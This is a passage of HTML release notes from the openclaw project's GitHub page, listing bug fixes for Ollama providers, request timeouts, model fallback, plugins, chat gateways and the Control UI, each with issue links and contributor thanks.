data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>, @shenkq97, and @1034378361.</li>
<li>Providers/Ollama: honor <code>/api/show</code> capabilities, custom Modelfile <code>PARAMETER num_ctx</code>, configured provider/model context defaults, whitelisted native params such as <code>temperature</code>, <code>top_p</code>, and <code>think</code>, and native thinking effort levels so local models get accurate tools, context, and thinking behavior without forcing full-context VRAM use. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4243652449" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64710" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64710/hovercard" href="https://github.com/openclaw/openclaw/issues/64710">#64710</a>, duplicate <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4247974485" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65343" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65343/hovercard" href="https://github.com/openclaw/openclaw/issues/65343">#65343</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4286116014" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68344" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68344/hovercard" href="https://github.com/openclaw/openclaw/issues/68344">#68344</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4068385205" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44550" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44550/hovercard" href="https://github.com/openclaw/openclaw/issues/44550">#44550</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115724405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52206" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52206/hovercard" href="https://github.com/openclaw/openclaw/issues/52206">#52206</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4093765160" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49684" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49684/hovercard" href="https://github.com/openclaw/openclaw/issues/49684">#49684</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288813407" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68662" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68662/hovercard" href="https://github.com/openclaw/openclaw/issues/68662">#68662</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4080851654" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48010" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48010/hovercard" href="https://github.com/openclaw/openclaw/issues/48010">#48010</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328145755" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71584" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71584/hovercard" href="https://github.com/openclaw/openclaw/issues/71584">#71584</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4069340291" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44786" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44786/hovercard" href="https://github.com/openclaw/openclaw/issues/44786">#44786</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4298714503" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69464" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69464/hovercard" href="https://github.com/openclaw/openclaw/pull/69464">#69464</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4070089946" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44955" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44955/hovercard" href="https://github.com/openclaw/openclaw/pull/44955">#44955</a>. Thanks @yuan-b, @netherby, @xilopaint, @Diyforfun2026, @neeravmakwana, @taitruong, @armi0024, @LokiCode404, @zhouZcong, @dshenster-byte, @tangzhi, @pandego, @maweibin, @Adam-Researchh, @EmpireCreator, @g0st1n, and @voltwake.</li>
<li>Image tool/media: honor <code>tools.media.image.timeoutSeconds</code> and matching per-model image timeouts in explicit image analysis, including the MiniMax VLM fallback path, so slow local vision models are not capped by hardcoded 30s/60s aborts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279519640" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67889" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67889/hovercard" href="https://github.com/openclaw/openclaw/issues/67889">#67889</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279773642" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67929" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67929/hovercard" href="https://github.com/openclaw/openclaw/pull/67929">#67929</a>. Thanks @AllenT22 and @alchip.</li>
<li>Providers/Ollama: strip custom provider prefixes before native chat/embedding requests, skip ambient localhost discovery unless config/auth opts in, handle custom remote <code>api: "ollama"</code> providers, accept OpenAI SDK-style <code>baseURL</code>, scope synthetic local auth and embedding bearer headers to declared host boundaries, resolve custom-named local providers for subagents, add provider-scoped model request timeouts, preserve explicit input modalities, and document <code>params.keep_alive</code> plus local/LAN/cloud/multi-host/web-search/embedding/thinking setup recipes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331946087" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72353" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72353/hovercard" href="https://github.com/openclaw/openclaw/issues/72353">#72353</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4163674492" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56939" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56939/hovercard" href="https://github.com/openclaw/openclaw/issues/56939">#56939</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4218171224" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62533" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62533/hovercard" href="https://github.com/openclaw/openclaw/issues/62533">#62533</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4063699337" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43945" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43945/hovercard" href="https://github.com/openclaw/openclaw/issues/43945">#43945</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4242267309" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64541" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64541/hovercard" href="https://github.com/openclaw/openclaw/issues/64541">#64541</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289810240" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68796" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68796/hovercard" href="https://github.com/openclaw/openclaw/issues/68796">#68796</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4040967916" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39690" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39690/hovercard" href="https://github.com/openclaw/openclaw/issues/39690">#39690</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4164708025" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57116" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57116/hovercard" href="https://github.com/openclaw/openclaw/pull/57116">#57116</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4218493302" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62549" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62549/hovercard" href="https://github.com/openclaw/openclaw/pull/62549">#62549</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4294028827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69261" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69261/hovercard" href="https://github.com/openclaw/openclaw/pull/69261">#69261</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4305660897" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69857" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69857/hovercard" href="https://github.com/openclaw/openclaw/pull/69857">#69857</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4246414524" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65143" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65143/hovercard" href="https://github.com/openclaw/openclaw/pull/65143">#65143</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4261643783" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66511" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66511/hovercard" href="https://github.com/openclaw/openclaw/pull/66511">#66511</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4063699337" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43945" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43945/hovercard" href="https://github.com/openclaw/openclaw/issues/43945">#43945</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4058318799" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43224" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43224/hovercard" href="https://github.com/openclaw/openclaw/pull/43224">#43224</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041140398" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39785" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/39785/hovercard" href="https://github.com/openclaw/openclaw/pull/39785">#39785</a>. Thanks @maximus-dss, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, @IanxDev, @tsukhani, @issacthekaylon, @Julien-BKK, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>, @hyspacex, @maxramsay, @Meli73, @LittleJakub, @Juankcba, @uninhibite-scholar, @yfge, @Skrblik, and @Mriris.</li>
<li>Providers/Ollama: move memory embeddings to <code>/api/embed</code> with batched <code>input</code>, route local web search through Ollama's signed daemon proxy while keeping cloud auth scoped, treat Ollama memory embeddings as key-optional in doctor, and keep model usage visible by estimating native transcript usage when <code>/api/chat</code> omits counters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041488866" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39983" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39983/hovercard" href="https://github.com/openclaw/openclaw/issues/39983">#39983</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292504181" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69132" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69132/hovercard" href="https://github.com/openclaw/openclaw/issues/69132">#69132</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076765556" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46584" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46584/hovercard" href="https://github.com/openclaw/openclaw/issues/46584">#46584</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4039238525" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39112" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/39112/hovercard" href="https://github.com/openclaw/openclaw/pull/39112">#39112</a>. Thanks @sskkcc, @LiudengZhang, @yoon1012, @hyspacex, @fengly78, and @TylonHH.</li>
<li>Agents/Ollama: parse stringified native tool-call arguments, retry native empty/thinking-only turns, accept already-prefixed LLM task model overrides, apply provider-owned replay normalization for Cloud models, validate explicit <code>--thinking max</code>, show resolved thinking defaults in Control UI, and include configured provider models in <code>models list --provider</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4303167754" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69735" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69735/hovercard" href="https://github.com/openclaw/openclaw/issues/69735">#69735</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4098081207" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50052" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50052/hovercard" href="https://github.com/openclaw/openclaw/issues/50052">#50052</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328894010" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71697" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71697/hovercard" href="https://github.com/openclaw/openclaw/issues/71697">#71697</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328145755" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71584" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71584/hovercard" href="https://github.com/openclaw/openclaw/issues/71584">#71584</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332228603" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72407" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72407/hovercard" href="https://github.com/openclaw/openclaw/issues/72407">#72407</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4246874368" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65207" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65207/hovercard" href="https://github.com/openclaw/openclaw/issues/65207">#65207</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306117215" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69910" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69910/hovercard" href="https://github.com/openclaw/openclaw/pull/69910">#69910</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4262256583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66552" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66552/hovercard" href="https://github.com/openclaw/openclaw/pull/66552">#66552</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206791675" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61223" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61223/hovercard" href="https://github.com/openclaw/openclaw/issues/61223">#61223</a>. Thanks @rongshuzhao, @yfge, @L3G, @ralphy-maplebots, @Hollychou924, @ismael-81, @g0st1n, @NotecAG, and @drzeast-png.</li>
<li>Providers/PDF/Ollama: add bounded network timeouts for Ollama model pulls and native Anthropic/Gemini PDF analysis requests so unresponsive provider endpoints no longer hang sessions indefinitely. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131775554" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54142" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54142/hovercard" href="https://github.com/openclaw/openclaw/issues/54142">#54142</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131780831" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54144" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54144/hovercard" href="https://github.com/openclaw/openclaw/pull/54144">#54144</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131781144" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54145" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54145/hovercard" href="https://github.com/openclaw/openclaw/pull/54145">#54145</a>. Thanks @jinduwang1001-max and @arkyu2077.</li>
<li>Docker/QA: add observability coverage to the normal Docker aggregate so QA-lab OTEL and Prometheus diagnostics run inside Docker. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Auto-reply: poison inbound message dedupe after replay-unsafe provider/runtime failures so retries stay safe before visible progress but cannot duplicate messages after block output, tool side effects, or session progress. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4295112826" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69303" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69303/hovercard" href="https://github.com/openclaw/openclaw/issues/69303">#69303</a>; keeps <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4181977803" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58549" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58549/hovercard" href="https://github.com/openclaw/openclaw/issues/58549">#58549</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4242766269" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64606" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64606/hovercard" href="https://github.com/openclaw/openclaw/issues/64606">#64606</a> as duplicate validation. Thanks @martingarramon, @NikolaFC, and @zeroth-blip.</li>
<li>Agents/model fallback: keep auto-persisted fallback model overrides selected across turns until <code>/new</code> or reset clears them, avoiding repeated probes of a known-bad primary while <code>/status</code> shows the selected and active models. Thanks @kibedu.</li>
<li>Agents/model fallback: jump directly to a known later live-session model redirect instead of walking unrelated fallback candidates, while preserving the already-landed live-session/fallback loop guard. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4167179452" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57471" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/57471/hovercard" href="https://github.com/openclaw/openclaw/issues/57471">#57471</a>; related loop family already closed via <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4181008782" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58496" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58496/hovercard" href="https://github.com/openclaw/openclaw/issues/58496">#58496</a>. Thanks @yuxiaoyang2007-prog.</li>
<li>Gateway/Bonjour: keep @homebridge/ciao cancellation handlers registered across advertiser restarts so late probing cancellations cannot crash Linux and other mDNS-churned gateways.</li>
<li>Plugins/startup: load the default <code>memory-core</code> slot during Gateway startup when permitted so active-memory recall can call <code>memory_search</code> and <code>memory_get</code> without requiring an explicit <code>plugins.slots.memory</code> entry, while preserving <code>plugins.slots.memory: "none"</code>.</li>
<li>Plugins/CLI: prefer native require for compiled bundled plugin JavaScript before jiti so read-only config, status, device, and node commands avoid unnecessary transform overhead on slow hosts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221630999" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62842" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62842/hovercard" href="https://github.com/openclaw/openclaw/issues/62842">#62842</a>. Thanks @Effet.</li>
<li>Plugins/compat/CLI: inventory doctor-side deprecation migrations separately from runtime plugin compatibility, add dated records for legacy extension-api, memory registration, provider hook/type aliases, runtime aliases, channel SDK helpers, and approval/test utility shims, refresh the persisted registry after managed plugin removals, make plugin install/uninstall writes conflict-aware, clear stale denylists, and fail tracked plugin/hook updates or unloadable package installs instead of leaving stale state. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>WebChat/Control UI: support non-video file attachments in chat uploads while preserving the existing image attachment path and MIME-sniff fallback for generic image uploads. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320611972" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70947" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70947/hovercard" href="https://github.com/openclaw/openclaw/pull/70947">#70947</a>) Thanks @IAMSamuelRodda.</li>
<li>Skills/memory: restore Chokidar v5 hot reloads by watching concrete skill and memory roots with filters, including SKILL.md removals and deleted skill folders without broad workspace recursion. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3994509566" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/27404" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/27404/hovercard" href="https://github.com/openclaw/openclaw/issues/27404">#27404</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4019092319" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/33585" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/33585/hovercard" href="https://github.com/openclaw/openclaw/issues/33585">#33585</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4048900568" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41606" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41606/hovercard" href="https://github.com/openclaw/openclaw/issues/41606">#41606</a>. Thanks @shelvenzhou, @08820048, and @rocke2020.</li>
<li>Gateway/chat: keep duplicate attachment-backed <code>chat.send</code> retries with the same idempotency key on the documented in-flight path so aborts still target the real active run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308621432" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70139" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70139/hovercard" href="https://github.com/openclaw/openclaw/issues/70139">#70139</a>. Thanks @Feelw00.</li>
<li>Gateway/session rows: report the same config-resolved thinking default that runtime sessions use, including global and per-agent defaults, so Control UI and TUI default labels stay aligned. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329269914" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71779" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71779/hovercard" href="https://github.com/openclaw/openclaw/pull/71779">#71779</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321156135" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70981" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70981/hovercard" href="https://github.com/openclaw/openclaw/pull/70981">#70981</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321797296" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71033" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71033/hovercard" href="https://github.com/openclaw/openclaw/pull/71033">#71033</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4311083134" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70302" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70302/hovercard" href="https://github.com/openclaw/openclaw/pull/70302">#70302</a>) Thanks @chen-zhang-cs-code, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>, and @cholaolu-boop.</li>
<li>Plugins: share package entrypoint resolution between install and discovery, reject mismatched <code>runtimeExtensions</code>, and cache bundled runtime-dependency manifest reads during scans.</li>
<li>WhatsApp/Web: keep quiet but healthy linked-device sessions connected by basing the watchdog on WhatsApp Web transport activity, while retaining a longer app-silence cap so frame activity cannot mask a stuck session forever. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317373252" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70678" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70678/hovercard" href="https://github.com/openclaw/openclaw/issues/70678">#70678</a>; carries forward the focused <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327494555" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71466" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71466/hovercard" href="https://github.com/openclaw/openclaw/pull/71466">#71466</a> approach and keeps <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235211931" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63939" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63939/hovercard" href="https://github.com/openclaw/openclaw/pull/63939">#63939</a> as related configurable-timeout follow-up. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oromeis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oromeis">@oromeis</a>.</li>
<li>Discord/gateway: count failed health-monitor restart attempts toward cooldown and hourly caps, and evict stale account lifecycle state during channel reloads so repeated Discord gateway recovery cannot loop on old status. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4037442367" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/38596" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/38596/hovercard" href="https://github.com/openclaw/openclaw/issues/38596">#38596</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042713721" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40413" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40413/hovercard" href="https://github.com/openclaw/openclaw/pull/40413">#40413</a>) Thanks @jellyAI-dev and @vashquez.</li>
<li>Cron/context engine: run isolated cron jobs under run-scoped context-engine session keys so prior runs of the same job are not inherited unless the job is explicitly session-bound. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331505048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72292" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72292/hovercard" href="https://github.com/openclaw/openclaw/pull/72292">#72292</a>) Thanks @jalehman.</li>
<li>Control UI: localize command palette labels, categories, skill shortcuts, footer hints, and connect-command copy labels while preserving localized command palette search matching. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206202649" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61130" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61130/hovercard" href="https://github.com/openclaw/openclaw/pull/61130">#61130</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206163055" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61119" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61119/hovercard" href="https://github.com/openclaw/openclaw/pull/61119">#61119</a>) Thanks @rubensfox20.</li>
<li>Plugins/memory-lancedb: request float embedding responses from OpenAI-compatible servers so local providers that default SDK requests to base64 no longer return dimension-mismatched LanceDB vectors while preserving configured dimensions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4075425486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45982" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45982/hovercard" href="https://github.com/openclaw/openclaw/issues/45982">#45982</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4187115245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59048" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59048/hovercard" href="https://github.com/openclaw/openclaw/pull/59048">#59048</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4075652492" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46069" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46069/hovercard" href="https://github.com/openclaw/openclaw/pull/46069">#46069</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4075431997" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45986" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/45986/hovercard" href="https://github.com/openclaw/openclaw/pull/45986">#45986</a>) Thanks @deep-introspection, @xiaokhkh, @caicongyang, and @thiswind.</li>
